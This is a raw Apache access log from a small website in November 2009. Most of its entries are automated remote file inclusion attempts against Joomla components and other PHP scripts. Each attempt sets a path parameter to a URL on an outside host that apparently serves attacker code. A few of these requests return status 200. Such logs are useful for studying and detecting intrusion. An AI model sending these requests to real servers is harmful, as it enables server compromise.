200.71.237.150 - - [23/Nov/2009:00:20:18 -0800] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
211.232.85.247 - - [23/Nov/2009:00:20:59 -0800] "GET /logs/access_090706.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [23/Nov/2009:00:21:16 -0800] "GET /logs/access_090706.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [23/Nov/2009:00:21:23 -0800] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [23/Nov/2009:00:21:54 -0800] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [23/Nov/2009:00:22:31 -0800] "GET /logs/access_090706.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [23/Nov/2009:00:23:03 -0800] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.100.117.230 - - [23/Nov/2009:00:23:55 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.100.117.230 - - [23/Nov/2009:00:23:55 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.100.117.230 - - [23/Nov/2009:00:23:55 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.71.237.150 - - [23/Nov/2009:00:25:21 -0800] "GET /logs/access_090921.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
211.232.85.247 - - [23/Nov/2009:00:26:46 -0800] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.232.85.247 - - [23/Nov/2009:00:26:46 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.232.85.247 - - [23/Nov/2009:00:26:46 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.232.85.247 - - [23/Nov/2009:00:28:46 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.232.85.247 - - [23/Nov/2009:00:28:46 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.232.85.247 - - [23/Nov/2009:00:28:52 -0800] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
82.98.136.21 - - [23/Nov/2009:00:29:00 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [23/Nov/2009:00:29:00 -0800] "GET /logs/access_091012.log%20%20//index.php?DOCUMENT_ROOT=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [23/Nov/2009:00:29:00 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [23/Nov/2009:00:31:13 -0800] "GET /logs/access_090706.log//index.php?DOCUMENT_ROOT=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [23/Nov/2009:00:31:51 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.232.85.247 - - [23/Nov/2009:00:31:54 -0800] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.232.85.247 - - [23/Nov/2009:00:31:54 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
82.98.136.21 - - [23/Nov/2009:00:33:40 -0800] "GET /logs/access_091012.log//index.php?DOCUMENT_ROOT=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.86.9.234 - - [23/Nov/2009:00:34:12 -0800] "GET /import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://indras.fileave.com/test.txt? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.galf.org"
70.86.9.234 - - [23/Nov/2009:00:34:13 -0800] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://indras.fileave.com/test.txt? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
70.86.9.234 - - [23/Nov/2009:00:34:35 -0800] "GET /import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://indras.fileave.com/test.txt? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "galf.org"
70.86.9.234 - - [23/Nov/2009:00:34:35 -0800] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://indras.fileave.com/test.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "galf.org"
69.42.146.14 - - [23/Nov/2009:00:35:11 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:35:13 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:35:14 -0800] "GET /logs/access_091012.log%20%20//index.php?DOCUMENT_ROOT=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:35:14 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:35:14 -0800] "GET /logs/access_091012.log%20%20//index.php?DOCUMENT_ROOT=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:35:14 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:35:29 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:35:29 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:35:29 -0800] "GET /logs/access_091012.log%20%20//index.php?DOCUMENT_ROOT=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.100.117.230 - - [23/Nov/2009:00:40:50 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.120 - - [23/Nov/2009:00:41:42 -0800] "GET /logs/access_090713.log//?_SERVER[DOCUMENT_ROOT]=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
78.110.50.120 - - [23/Nov/2009:00:41:42 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 200 4947 "-" "libwww-perl/5.831" "www.galf.org"
78.110.50.120 - - [23/Nov/2009:00:41:42 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.831" "www.galf.org"
119.63.198.43 - - [23/Nov/2009:00:42:14 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:44:48 -0800] "GET /logs/access_090706.log//index.php?DOCUMENT_ROOT=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:45:02 -0800] "GET /logs/access_090706.log//index.php?DOCUMENT_ROOT=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:46:19 -0800] "GET /logs/access_090706.log//index.php?DOCUMENT_ROOT=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.120 - - [23/Nov/2009:00:48:30 -0800] "GET /logs/access.log/index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
78.110.50.120 - - [23/Nov/2009:00:48:30 -0800] "GET /index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
78.110.50.120 - - [23/Nov/2009:00:48:30 -0800] "GET /logs/index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:48:34 -0800] "GET /logs/access_091012.log//index.php?DOCUMENT_ROOT=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:48:58 -0800] "GET /logs/access_091012.log//index.php?DOCUMENT_ROOT=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:50:03 -0800] "GET /logs/access_091012.log//index.php?DOCUMENT_ROOT=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.141.103.61 - - [23/Nov/2009:00:51:10 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.141.103.61 - - [23/Nov/2009:00:51:10 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.141.103.61 - - [23/Nov/2009:00:51:14 -0800] "GET /logs/access_091012.log%20%20//index.php?DOCUMENT_ROOT=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [23/Nov/2009:00:52:05 -0800] "GET /logs/access_090810.log///components/com_freechat/chatwindow.php?uebergabe=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [23/Nov/2009:00:52:05 -0800] "GET //components/com_freechat/chatwindow.php?uebergabe=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [23/Nov/2009:00:52:05 -0800] "GET /logs///components/com_freechat/chatwindow.php?uebergabe=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.106.59 - - [23/Nov/2009:00:52:08 -0800] "GET /logs/access_090810.log HTTP/1.1" 206 500001 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.galf.org"
65.55.106.137 - - [23/Nov/2009:01:00:45 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.106.137 - - [23/Nov/2009:01:01:28 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
64.141.103.61 - - [23/Nov/2009:01:04:37 -0800] "GET /logs/access_090706.log//index.php?DOCUMENT_ROOT=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:01:06:15 -0800] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:01:06:15 -0800] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:01:06:15 -0800] "GET /logs/access_091026.log%20%20/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:01:06:15 -0800] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:01:06:16 -0800] "GET /logs/access_091026.log%20%20/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:01:06:16 -0800] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:01:06:17 -0800] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:01:06:18 -0800] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:01:06:18 -0800] "GET /logs/access_091026.log%20%20/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.100.117.230 - - [23/Nov/2009:01:07:35 -0800] "GET /logs/access_091012.log%20%20//index.php?DOCUMENT_ROOT=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.100.117.230 - - [23/Nov/2009:01:07:35 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.vnmhost.net/01.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.100.117.230 - - [23/Nov/2009:01:07:35 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.141.103.61 - - [23/Nov/2009:01:09:48 -0800] "GET /logs/access_091012.log//index.php?DOCUMENT_ROOT=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.71.186.226 - - [23/Nov/2009:01:17:13 -0800] "GET /logs/access.log%20%20///registration_detailed.inc.php?mosConfig_absolute_path=http://203.252.233.173/bbs//skin/happycast_category_bluishgreen/idg1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.71.186.226 - - [23/Nov/2009:01:17:13 -0800] "GET /logs///registration_detailed.inc.php?mosConfig_absolute_path=http://203.252.233.173/bbs//skin/happycast_category_bluishgreen/idg1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.71.186.226 - - [23/Nov/2009:01:17:13 -0800] "GET //registration_detailed.inc.php?mosConfig_absolute_path=http://203.252.233.173/bbs//skin/happycast_category_bluishgreen/idg1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
70.38.112.174 - - [23/Nov/2009:01:17:34 -0800] "GET //registration_detailed.inc.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
70.38.112.174 - - [23/Nov/2009:01:17:34 -0800] "GET /logs///registration_detailed.inc.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
70.38.112.174 - - [23/Nov/2009:01:17:34 -0800] "GET /logs/access_090622.log%20%20///registration_detailed.inc.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.71.186.226 - - [23/Nov/2009:01:17:52 -0800] "GET /logs/access_090622.log%20%20///registration_detailed.inc.php?mosConfig_absolute_path=http://203.252.233.173/bbs//skin/happycast_category_bluishgreen/idg1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.71.186.226 - - [23/Nov/2009:01:17:52 -0800] "GET /logs///registration_detailed.inc.php?mosConfig_absolute_path=http://203.252.233.173/bbs//skin/happycast_category_bluishgreen/idg1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.71.186.226 - - [23/Nov/2009:01:17:52 -0800] "GET //registration_detailed.inc.php?mosConfig_absolute_path=http://203.252.233.173/bbs//skin/happycast_category_bluishgreen/idg1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.131.76.56 - - [23/Nov/2009:01:18:30 -0800] "GET /logs/access_091102.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/11/3/2634841/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
64.131.76.56 - - [23/Nov/2009:01:18:30 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/11/3/2634841/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
64.131.76.56 - - [23/Nov/2009:01:18:30 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/11/3/2634841/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
70.38.112.174 - - [23/Nov/2009:01:27:20 -0800] "GET /logs/access_091019.log///registration_detailed.inc.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [23/Nov/2009:01:27:21 -0800] "GET /logs/access_090309.log///registration_detailed.inc.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.71.186.226 - - [23/Nov/2009:01:27:36 -0800] "GET /logs/access_090608.log///registration_detailed.inc.php?mosConfig_absolute_path=http://203.252.233.173/bbs//skin/happycast_category_bluishgreen/idg1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.71.186.226 - - [23/Nov/2009:01:27:38 -0800] "GET /logs/access_090615.log///registration_detailed.inc.php?mosConfig_absolute_path=http://203.252.233.173/bbs//skin/happycast_category_bluishgreen/idg1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.100.117.230 - - [23/Nov/2009:01:30:01 -0800] "GET /logs/access_090706.log//index.php?DOCUMENT_ROOT=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.107.130 - - [23/Nov/2009:01:30:16 -0800] "GET //registration_detailed.inc.php?mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs///skin/happycast_category_lightblack/robots.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.125.107.130 - - [23/Nov/2009:01:30:16 -0800] "GET /logs///registration_detailed.inc.php?mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs///skin/happycast_category_lightblack/robots.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.125.107.130 - - [23/Nov/2009:01:30:16 -0800] "GET /logs///registration_detailed.inc.php?mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs///skin/happycast_category_lightblack/robots.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.107.130 - - [23/Nov/2009:01:30:16 -0800] "GET /logs/access.log%20%20///registration_detailed.inc.php?mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs///skin/happycast_category_lightblack/robots.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.125.107.130 - - [23/Nov/2009:01:30:16 -0800] "GET //registration_detailed.inc.php?mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs///skin/happycast_category_lightblack/robots.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.107.130 - - [23/Nov/2009:01:30:20 -0800] "GET /logs/access_090622.log%20%20///registration_detailed.inc.php?mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs///skin/happycast_category_lightblack/robots.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:01:32:17 -0800] "GET /logs/access.log//setup.php?dir=http://cbnumed.or.kr/bbs/enda-id1.txt?%0F? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:01:32:17 -0800] "GET /logs//setup.php?dir=http://cbnumed.or.kr/bbs/enda-id1.txt?%0F? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:01:32:18 -0800] "GET /setup.php?dir=http://cbnumed.or.kr/bbs/enda-id1.txt?%0F? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.71.186.226 - - [23/Nov/2009:01:32:23 -0800] "GET /logs/access_090525.log///registration_detailed.inc.php?mosConfig_absolute_path=http://203.252.233.173/bbs//skin/happycast_category_bluishgreen/idg1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:01:32:42 -0800] "GET /logs//components/com_booklibrary/doc/releasenote.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:01:32:42 -0800] "GET /logs/access_090615.log//components/com_booklibrary/doc/releasenote.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:01:32:42 -0800] "GET /components/com_booklibrary/doc/releasenote.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.71.186.226 - - [23/Nov/2009:01:33:08 -0800] "GET /logs/access_090713.log///registration_detailed.inc.php?mosConfig_absolute_path=http://203.252.233.173/bbs//skin/happycast_category_bluishgreen/idg1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.71.186.226 - - [23/Nov/2009:01:33:13 -0800] "GET /logs/access_090504.log///registration_detailed.inc.php?mosConfig_absolute_path=http://203.252.233.173/bbs//skin/happycast_category_bluishgreen/idg1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.71.186.226 - - [23/Nov/2009:01:33:15 -0800] "GET /logs/access_090622.log///registration_detailed.inc.php?mosConfig_absolute_path=http://203.252.233.173/bbs//skin/happycast_category_bluishgreen/idg1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [23/Nov/2009:01:33:41 -0800] "GET /logs/access_090525.log///registration_detailed.inc.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:01:33:47 -0800] "GET /logs/access.log//setup.php?dir=http://cbnumed.or.kr/bbs/enda-id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:01:33:47 -0800] "GET /logs//setup.php?dir=http://cbnumed.or.kr/bbs/enda-id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:01:33:47 -0800] "GET /setup.php?dir=http://cbnumed.or.kr/bbs/enda-id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:01:34:14 -0800] "GET /logs/access_090831.log//setup.php?dir=http://cbnumed.or.kr/bbs/enda-id1.txt?%0F? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:01:34:14 -0800] "GET /logs/access_090817.log//setup.php?dir=http://cbnumed.or.kr/bbs/enda-id1.txt?%0F? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [23/Nov/2009:01:34:26 -0800] "GET /logs/access_090713.log///registration_detailed.inc.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [23/Nov/2009:01:34:27 -0800] "GET /logs/access_090504.log///registration_detailed.inc.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
